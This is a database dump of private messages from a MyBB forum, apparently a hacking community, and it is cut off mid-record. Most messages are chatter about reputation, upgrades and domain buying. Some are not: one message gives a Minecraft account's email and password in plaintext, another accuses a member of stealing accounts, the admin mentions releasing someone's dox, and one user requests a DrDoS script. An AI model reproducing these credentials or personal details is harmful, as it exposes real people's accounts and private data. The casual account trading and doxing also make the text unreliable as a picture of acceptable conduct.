(`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3069', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey how do i +rep people', '0', '[quote=\'treyz123456789\'] hey i dont know hoe to +rep people [/quote] You have to be a Upgraded member to +rep.', '1350144129', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3071', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Gamers', '0', 'You have been accepted.', '1350144227', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3073', '100', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Slow down ..', '0', 'You need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ', '1350144321', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3075', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Accepted', '0', 'You have been accepted to gamers, Please be patient while we gather more members.', '1350145852', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3077', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Accepted', '0', '[quote=\'NXK\'] You have been accepted to gamers, Please be patient while we gather more members. [/quote] lol thank you, pretty awesome.', '1350147897', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3083', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: gamers crew please', '0', '[quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] hey i want to join the gamers crew my username is treyz123456789 thanks pm me back [/quote] That\'s a request from an active gamer on ubers. I would apprecia if you could add him to the gamers group. [/quote] He\'s already been added. I did it this morning.', '1350153503', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3086', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks', '1350156158', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3088', '128', '100', '128', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'DrDos script', '0', 'Hi there, May I have that DrDos script you are talking about ? I will not release this somewhere else ! I thank you in advance ^^', '1350159246', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3090', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING ON UBER FORUMS I KNOW HOW TO [/quote] Same way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account. [/quote] thanks appreciated keep up the good work and ill stay active ', '1350162797', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3092', '257', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Slow down ..', '0', '[quote=\'??zg???g????61\'] You need to stop spamming posts, you\'ve been a member for ONE day and you already have 54 posts. Try to be more HQ [/quote] sorry im trying my hardest not to spam if you look at some of my post its not all spam most of its Hq SORRY:(', '1350162890', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3094', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Gamers', '0', '[quote=\'NXK\'] You have been accepted. [/quote] THANK YOU VERY MUCH NXK', '1350162950', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3096', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'that logo ', '0', 'hey the company is noob and the rest is up to you you can completly do what you want with ', '1350163834', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3098', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING ON UBER FORUMS I KNOW HOW TO [/quote] Same way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account. [/quote] are you sure you upgraded me because i still cant +rep people', '1350164126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3100', '257', '61', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey i cant rep people ', '0', 'hey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work', '1350165767', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3102', '61', '257', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey i cant rep people ', '0', '[quote=\'treyz123456789\'] hey i cant rep people its kinda annoying beacause i wanna rep people for all there hard work [/quote] You need to purchase an upgrade if you\'d like to rep people. It costs 5$', '1350166793', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3423', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\'] Look I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. [/quote] sorry im just so excited :)', '1350616880', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3106', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap.', '1350169229', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3109', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird', '1350170269', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3420', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: codingcomputing', '0', '[quote=\'t3h jok3r\'] Sup I joined this new forum, you will figure out why I joined when you see it. I\'m a mod on his site and helping him out because he is not that experienced with MyBB etc. He\'s site is new and he needs someone really active like you. I was wondering if you want to help him out with his activity? [/quote] Not interested right now.. Having thoughts.', '1350616702', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3112', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are', '1350170715', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3416', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'t3h jok3r\'] [quote=\'?(???)?TREYZ?(???)?\'] [quote=\'t3h jok3r\'] [quote=\'?(???)?TREYZ?(???)?\'] would you like a minecraft premium i been giving alot away lately and i forgot to give you one. :O [/quote] Nope but thanks for the offer. You can start one giveaway if you want in the gamers private forum. [/quote] i have done 3 giveaways now [/quote] That\'s cool. Thanks for contributing. [/quote] no worries are we advertising because its a bit inactive', '1350611883', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3535', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\'] Hi [b]xEP1C_SC0P3Sx[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM. ----------------------------- Name of award: Elite Description: Special award to signify Elite status. Award Image: [img]http://l33thacking.net/inc/plugins/achivements/upload/custom_21_10_12_12_08_31.jpg[/img] ----------------------------- The award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them. [/quote] Thank you very much appreciated admin', '1350797365', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3121', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5', '1350172571', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3123', '2', '224', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"224\";}}', '2', 'Re: Site', '0', '[quote=\'monkey\'] [quote=\'Apathy\'] [quote=\'monkey\'] [quote=\'Apathy\'] [quote=\'monkey\'] How much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question. [/quote] I have no idea sorry. [/quote] How\'s $10? [/quote] I don\'t know contact the founder. [/quote] What\'s his user? [/quote] http://l33thacking.net/user-1.html', '1350173060', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3130', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5 [/quote] Use retailmenot.com for coupons. [/quote] Should I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608', '1350177233', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3410', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'t3h jok3r\'] [quote=\'?(???)?TREYZ?(???)?\'] would you like a minecraft premium i been giving alot away lately and i forgot to give you one. :O [/quote] Nope but thanks for the offer. You can start one giveaway if you want in the gamers private forum. [/quote] i have done 3 giveaways now ', '1350611067', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3132', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] [quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING ON UBER FORUMS I KNOW HOW TO [/quote] Same way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account. [/quote] are you sure you upgraded me because i still cant +rep people [/quote] would you mind upgrading now please ;) I forgot to upgrade because I got busy with some other stuff. [/quote]', '1350183322', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3137', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Forum', '0', 'Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :) Im Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852 I have had experience being moderator before at a hacking forum called Eliteguys Here is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L As you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there here is my profile on L33T HACKING : http://l33thacking.net/user-258.html Looking forward to hearing from you ', '1350195521', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3361', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\'] [quote=\'XTr3ME PiX3L\'] Ok mate i registered , if possible i would like to be Moderator or Staff at your forum :) Im Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852 I have had experience being moderator before at a hacking forum called Eliteguys Here is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L As you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there here is my profile on L33T HACKING : http://l33thacking.net/user-258.html Looking forward to hearing from you [/quote] http://l33thacking.net/misc.php?action=help&hid=17 [/quote] Ok i understand , How about a free upgrade then? You said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum I am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here.. The reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t Ubers is all about money now , i id rather be a part of this community instead of ubers How about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)', '1350543928', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3140', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\'] [quote=\'XxTREYZxX\'] [quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] [quote=\'t3h jok3r\'] [quote=\'treyz123456789\'] SORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING ON UBER FORUMS I KNOW HOW TO [/quote] Same way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account. [/quote] are you sure you upgraded me because i still cant +rep people [/quote] would you mind upgrading now please ;) I forgot to upgrade because I got busy with some other stuff. [/quote] [/quote] I did it after I replied to the PM. [/quote] thanks very nuch', '1350198783', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3143', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', '[quote=\'t3h jok3r\'] Can you trust him? I released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. [/quote] hes a nice guy, and he probably forgive you.', '1350214288', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3146', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Email', '0', 'i have updated my e-mail', '1350221335', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3148', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', 'could you please add ipod to moderator of unique, I want him as co-leader, thanks.', '1350230423', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3151', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] Can you trust him? I released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. [/quote] hes a nice guy, and he probably forgive you. [/quote] I spoke to him on Skype and she and didn\'t forgive me and I\'ll add him as a Moderator. [/quote] thanks alot, and I think hes a good guy but thats on him if he forgives you or not', '1350234102', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3523', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'here you go', '0', 'Hey remember when you wanted a account for Minecraft and it didn\'t work,well i feel bad because you didn\'t get one here you go Username: eliotbehr@gmail.com Password:pencil This one WORKS and don\'t tell me it doesn\'t enjoy my friend ', '1350782980', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3156', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that minecraft account ', '0', 'hey iTzIpod whats doing i\'m here for that minecraft account thanks:)', '1350259882', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3227', '82', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'You\'re Funny', '0', 'I see you were on the AQW account earlier today. I hope you are enjoying the AQW Account + the MC Account. Because you sir. Scammed me... You simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. I can tell you logged on the account because 1. I was never equipping those items. 2. My password is incorrect. You changed it obviously. 3. My email was changed also. I can\'t recover the account using my email. 4. You didn\'t go on Skype talking to me explaining what happened or anything. 5. You scammed me. :) Enjoy the accounts. ', '1350356818', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3160', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that 